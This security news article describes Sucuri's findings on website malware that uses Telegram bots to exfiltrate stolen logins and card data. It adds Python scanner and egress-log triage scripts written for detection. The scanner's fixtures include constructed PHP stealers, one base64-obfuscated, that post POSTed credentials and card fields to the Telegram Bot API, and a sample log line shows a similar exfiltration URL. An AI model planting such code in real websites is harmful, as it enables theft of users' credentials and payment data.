Telegram, synonymous with secure messaging, has paradoxically become a tool for cybercriminals who abuse the platform’s strengths to target unsuspecting websites.
Once known for its commitment to user privacy and security, this popular messaging platform is now used in ways its creators never intended: as a conduit for controlling malware-infected websites.
The Misuse of Telegram in Website Malware
According to the Sucuri blog, Telegram’s versatility as a messaging app is undisputed: the app has numerous features that cater to both privacy and flexibility.
However, these qualities have attracted a less savory user base — cybercriminals.
One of the primary ways attackers use Telegram is to receive notifications about the status of their malware.
Once a website is compromised, a Telegram bot can alert the attacker and provide real-time updates about the infected site.
This includes alerts when new data is captured, additional malware is successfully implanted, or an administrator interacts with the infected parts of the website.
Data Exfiltration
Telegram bots are often configured to exfiltrate stolen data directly to the attacker’s Telegram account.
This can include sensitive user information, login credentials, and financial data.
Because a Bot API call is nothing more than an HTTPS request to api.telegram.org, the stolen data leaves the server as ordinary-looking web traffic to a popular, reputable domain, which lets it slip past controls that key on unknown or newly registered destinations rather than on what a web server should legitimately be contacting.
Traditionally, malware requires a command and control (C&C) server to receive updated commands and to manage the infected systems. Telegram provides a stealthier alternative.
Through simple messages, attackers can command their deployed malware to download additional components, spread to other network parts, or even initiate a denial-of-service attack.
Telegram simplifies the infrastructure required for such operations and reduces the risk of exposing the C&C servers to law enforcement and cybersecurity experts.
Telegram’s encryption and privacy policies also make tracing these activities back to their perpetrators difficult: the only artifacts left in the malware are a bot token and a chat ID, neither of which identifies the operator without Telegram’s cooperation.
Attackers hide behind this veil of anonymity, complicating efforts by law enforcement and researchers to track and neutralize threats.
Sucuri reports that last year its research team found numerous malware infections leveraging Telegram in website attacks.
The team cleaned over 11,000 malicious files from over 290 infected websites related to this malware.
Case Studies
Case Study 1: Monitoring and Notification System
We occasionally find attackers using Telegram bots to receive real-time notifications about their malware’s status on compromised websites, including alerts on new data capture, additional malware implants, and administrator interactions.
The implant calls the Bot API with a hard-coded bot_token and chat_id, posting the website’s URL, name, and admin email address to the chat the attacker monitors, where those details can be collected and used.
Case Study 2: Phishing for Credit Card Details
Attackers often use malicious PHP scripts on compromised websites to harvest stolen credentials and sensitive data and send them to servers they control.
Recently, however, we have seen a surge in the use of the Telegram API for this exfiltration, since it gives the attacker an encrypted delivery channel without having to run a collection server of their own.
During an investigation, we encountered a phishing page mimicking DHL, a global courier service.
The fake page was designed to look like a legitimate DHL tracking page with similar colors, fonts, and styles.
Whenever a form is submitted at any of the steps, JavaScript gathers the data and relays it to the Telegram bot through a service hosted on Herokuapp.
Routing the traffic through legitimate Heroku infrastructure lets the attackers hide the Telegram connection behind a trusted domain, a notable evolution in phishing technique.
Case Study 3: Phishing for Login Credentials
In another recent example, attackers exploited the Telegram API to facilitate a phishing scam.
They created a mailer script that used Telegram to transmit stolen data such as addresses, emails, mobile numbers, and IP addresses directly to the attacker.
The most frequently detected phishing script with Telegram exfiltration was found in telegram_bot.php files inside various phishing sub-directories.
This channel streamlines the collection and exploitation of sensitive user information. Because the attacker is notified instantly, the stolen credentials can be used before the victim has a chance to change them or their organization notices any suspicious activity.
Case Study 4: Server-side Data Exfiltration
Attackers are continually finding ingenious ways to steal data from compromised websites.
In recent years, attackers have been exploiting communication systems like the Telegram API for data exfiltration from the website’s server.
This allows attackers to send stolen data directly to a bot, making detection more challenging and providing real-time access to the compromised information.
One notable example involves an attack on a WordPress site where malicious code was injected into the wp-login.php file.
This code captured login credentials each time a user attempted to log in and sent the stolen data to a Telegram bot.
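The four case studies share one artifact: a call to the Telegram Bot API, whose URL always has the shape https://api.telegram.org/bot&lt;token&gt;/&lt;method&gt;, carrying a bot token and a chat_id. The following static triage script is an added example written for this article, not Sucuri’s code or any of the implants it describes. It sweeps a web root for that shape, extracts the token and chat_id as indicators, and also decodes base64 literals, since implants commonly hide the API URL that way. The token format (bot id, colon, roughly 35 URL-safe characters) is an assumption to tune, and the three PHP samples are constructed to mirror the telegram_bot.php and wp-login.php patterns described above.

```python
"""Static triage of web files for Telegram Bot API exfiltration implants.

Added example for this article, not Sucuri's code. Every Bot API call has the
shape https://api.telegram.org/bot<token>/<method>, so a web root can be swept
for that shape even when the URL is concatenated at runtime or hidden in base64.
The token format is an assumption to tune; the sample implants are constructed.
"""
import base64
import binascii
import os
import re
from dataclasses import dataclass, field

TELEGRAM_HOST = "api.telegram.org"
# bot id, colon, secret part; ~35 URL-safe chars is the shape commonly seen (assumed, tune if needed)
TOKEN_RE = re.compile(r"(?<!\d)\d{8,10}:[A-Za-z0-9_-]{33,36}(?![A-Za-z0-9_-])")
METHOD_RE = re.compile(r"\b(sendMessage|sendDocument|sendPhoto|getUpdates)\b")  # methods used for exfil
# chat_id as query string (chat_id=...), PHP array key ('chat_id' => ...) or variable ($chat_id = "...")
CHAT_ID_RE = re.compile(r"chat_id\W{1,6}?(-?\d{5,})")
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
SCAN_EXT = {".php", ".inc", ".js", ".html", ".htm", ".txt"}


@dataclass
class Finding:
    path: str
    tokens: list = field(default_factory=list)
    chat_ids: list = field(default_factory=list)
    methods: list = field(default_factory=list)
    obfuscated: bool = False  # API host only visible after base64 decoding


def decoded_strings(text):
    """Printable ASCII hidden in base64 literals, a common way to hide the API URL at rest."""
    found = []
    for m in B64_RE.finditer(text):
        try:
            s = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if s.isprintable():
            found.append(s)
    return found


def scan_text(path, text):
    """Return a Finding if the text appears to talk to the Telegram Bot API, else None."""
    views = [text] + decoded_strings(text)
    host_plain = TELEGRAM_HOST in text
    host_decoded = any(TELEGRAM_HOST in v for v in views[1:])
    tokens = sorted({m.group(0) for v in views for m in TOKEN_RE.finditer(v)})
    methods = sorted({m.group(1) for v in views for m in METHOD_RE.finditer(v)})
    chat_ids = sorted({m.group(1) for v in views for m in CHAT_ID_RE.finditer(v)})
    # Flag on the API host, or on a token sitting next to an API method if the host is hidden another way.
    if not (host_plain or host_decoded or (tokens and methods)):
        return None
    return Finding(path, tokens, chat_ids, methods, obfuscated=host_decoded and not host_plain)


def scan_tree(root):
    """Walk a web root and return a Finding for every matching file."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    finding = scan_text(path, fh.read())
            except OSError:
                continue
            if finding:
                findings.append(finding)
    return findings


FAKE_TOKEN = "123456789:AAExFakeTokenForDemo_0123456789abcd"  # constructed; not a real bot
B64_PREFIX = base64.b64encode(b"https://api.telegram.org/bot").decode()

# Constructed: credential stealer in the shape of the telegram_bot.php / wp-login.php implants
SAMPLE_PLAIN = f'''<?php
$token = "{FAKE_TOKEN}";
$chat_id = "987654321";
$text = "User: " . $_POST['log'] . " Pass: " . $_POST['pwd'] . " IP: " . $_SERVER['REMOTE_ADDR'];
@file_get_contents("https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chat_id . "&text=" . urlencode($text));
'''
# Constructed: the same exfiltration with the API URL base64-encoded at rest
SAMPLE_B64 = f'''<?php
$u = base64_decode("{B64_PREFIX}") . "{FAKE_TOKEN}" . "/sendMessage";
@file_get_contents($u . "?" . http_build_query(['chat_id' => -1001234567890, 'text' => $_POST['cc'] . ' ' . $_POST['exp']]));
'''
# Constructed: benign code that mentions Telegram without touching the Bot API
SAMPLE_BENIGN = '<a href="https://t.me/share/url?url=<?php echo $url; ?>">Share on Telegram</a>'

if __name__ == "__main__":
    import sys
    for f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{f.path}: tokens={f.tokens} chat_ids={f.chat_ids} methods={f.methods} obfuscated={f.obfuscated}")
```

Run it against a web root (`python3 scan.py /var/www/html`) and treat every hit as an incident artifact. Handle an extracted token as a secret, not just an indicator: anyone holding it can drive the bot, so it belongs in the case file and in the abuse report, not in a public blocklist.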
While other messaging apps like WhatsApp and Signal also offer encryption, Telegram’s unique features make it particularly appealing to bad actors:
- Telegram’s API is more accessible and allows more extensive automation of functions, making it easier for attackers to deploy bots.
- Telegram offers much greater practical anonymity. Registering a Telegram account also takes a phone number, but a bot created through BotFather is driven only by its token and a chat ID, so nothing in the malware points back to a phone number or a device.
- WhatsApp and Signal encrypt messages but do not offer the same degree of anonymity or API flexibility, both of which are key to orchestrating and managing attacks without revealing an identity.
Addressing the Threat
To detect and protect against Telegram-based malware, website administrators can adopt several strategies:
- Regularly analyze network traffic for connections to api.telegram.org. A web server rarely has a legitimate reason to contact the Telegram Bot API, so any such connection from the web tier warrants investigation.
- Check server logs for unusual activities, such as unexpected outgoing connections or unusual data payloads being sent.
- Install advanced website security monitoring that uses anomaly detection algorithms to flag and identify unusual behavior.
- Use a web application firewall and intrusion detection system (IDS) to identify and mitigate threats.
- Regularly keep all systems and software patched with the latest updates to close vulnerabilities that attackers could exploit.
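The first two steps above come down to one question: which of my web servers talked to api.telegram.org, and when? The script below is an added example written for this article, not Sucuri’s code, that answers it from egress proxy logs. It assumes Squid-native access-log lines (timestamp, elapsed, client, code/status, bytes, method, URL, ident, hierarchy/peer, type); the log lines themselves are constructed and use private and documentation address ranges. One caveat it makes explicit: for HTTPS the proxy records only the CONNECT host, never the /bot&lt;token&gt;/ path, so the connection itself is the indicator, and the token can only be recovered when the URL is visible (plain HTTP or TLS-inspected traffic).

```python
"""Egress-log triage for web servers reaching the Telegram Bot API.

Added example for this article, not Sucuri's code. Parses Squid-native
access-log lines (format assumed) and reports each client that contacted
api.telegram.org. Over HTTPS only the CONNECT host is visible, so the
connection is the indicator; a visible URL additionally yields the bot token.
Sample lines are constructed.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime, timezone
from typing import Optional
from urllib.parse import urlparse

WATCHLIST = {"api.telegram.org"}  # a web server has no business contacting these
TOKEN_RE = re.compile(r"/bot(\d{8,10}:[A-Za-z0-9_-]{33,36})/")  # token shape assumed; tune if needed


@dataclass
class Hit:
    client: str
    count: int = 0
    first_seen: Optional[datetime] = None
    last_seen: Optional[datetime] = None
    tokens: set = field(default_factory=set)
    tunneled_only: bool = True  # only CONNECTs seen, so no URL path (and no token) was visible


def parse_squid_line(line):
    """Pull timestamp, client, method and destination host out of one Squid-native line."""
    parts = line.split()
    if len(parts) < 7:
        return None
    ts, client, method, url = float(parts[0]), parts[2], parts[5], parts[6]
    # CONNECT lines carry host:port only; other methods carry a full URL
    host = url.rsplit(":", 1)[0] if method == "CONNECT" else urlparse(url).hostname
    return {"ts": datetime.fromtimestamp(ts, tz=timezone.utc),
            "client": client, "method": method, "host": host, "url": url}


def triage(lines):
    """Aggregate watchlisted egress per client; returns {client_ip: Hit}."""
    hits = {}
    for line in lines:
        rec = parse_squid_line(line)
        if rec is None or rec["host"] not in WATCHLIST:
            continue
        h = hits.setdefault(rec["client"], Hit(rec["client"]))
        h.count += 1
        h.first_seen = rec["ts"] if h.first_seen is None else min(h.first_seen, rec["ts"])
        h.last_seen = rec["ts"] if h.last_seen is None else max(h.last_seen, rec["ts"])
        if rec["method"] != "CONNECT":
            h.tunneled_only = False
            h.tokens.update(TOKEN_RE.findall(rec["url"]))
    return hits


def report(hits):
    """One line per offending client, ordered by first sighting."""
    out = []
    for h in sorted(hits.values(), key=lambda x: x.first_seen):
        what = "tokens " + ", ".join(sorted(h.tokens)) if h.tokens else "CONNECT only, token not visible"
        out.append(f"{h.client}: {h.count} request(s) to Telegram Bot API, "
                   f"{h.first_seen:%Y-%m-%d %H:%M:%S}Z .. {h.last_seen:%H:%M:%S}Z, {what}")
    return out


# Constructed Squid lines: 10.0.0.x are web servers, 203.0.113.x are placeholder upstream peers
SAMPLE_LOG = """\
1716212345.123    245 10.0.0.12 TCP_TUNNEL/200 3920 CONNECT api.telegram.org:443 - HIER_DIRECT/203.0.113.10 -
1716212346.004     88 10.0.0.12 TCP_MISS/200 1123 GET http://api.wordpress.org/core/version-check/1.7/ - HIER_DIRECT/203.0.113.20 application/json
1716212390.551    301 10.0.0.12 TCP_TUNNEL/200 2810 CONNECT api.telegram.org:443 - HIER_DIRECT/203.0.113.10 -
1716212401.200     52 10.0.0.40 TCP_MISS/200 6610 GET http://api.telegram.org/bot123456789:AAExFakeTokenForDemo_0123456789abcd/sendMessage?chat_id=987654321&text=User%3Aadmin - HIER_DIRECT/203.0.113.10 text/html
1716212410.777    120 10.0.0.31 TCP_TUNNEL/200 5120 CONNECT downloads.wordpress.org:443 - HIER_DIRECT/203.0.113.20 -
""".splitlines()

if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    print("\n".join(report(triage(source))))
```

With the constructed log, 10.0.0.12 is reported for two CONNECTs with no token visible and 10.0.0.40 for one plain-HTTP request that exposes the token; 10.0.0.31, which only fetched WordPress updates, is not reported. In a real estate the same logic applies to DNS query logs or firewall egress logs: the decision is made on the destination host, because the web tier should never need that destination at all.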
While Telegram is well-known for its secure messaging capabilities, bad actors are exploiting its features to conduct sophisticated attacks on websites.
There is no perfect solution to prevent this. However, Telegram should look into resolving this and seeking ways to prevent abuse of its platform without impacting its core principle of privacy.